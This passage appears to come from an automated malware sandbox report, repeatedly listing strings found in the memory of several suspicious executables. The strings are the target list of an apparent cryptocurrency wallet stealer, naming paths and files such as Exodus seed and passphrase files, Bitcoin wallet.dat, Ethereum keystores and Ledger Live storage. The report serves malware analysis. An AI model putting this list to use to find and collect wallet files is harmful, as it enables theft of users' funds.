                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: s\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: s\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: \Electrum\wallets\
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: s\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 6f9ea40b81.exe, 00000008.00000003.3438675876.00000000011E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: s\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: s\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: s\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: s\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: s\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: \Ethereum\
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: s\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: Ethereum
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: s\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: s\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: s\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: s\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: keystore
                          Source: 4508a44a11.exe, 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: s\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia 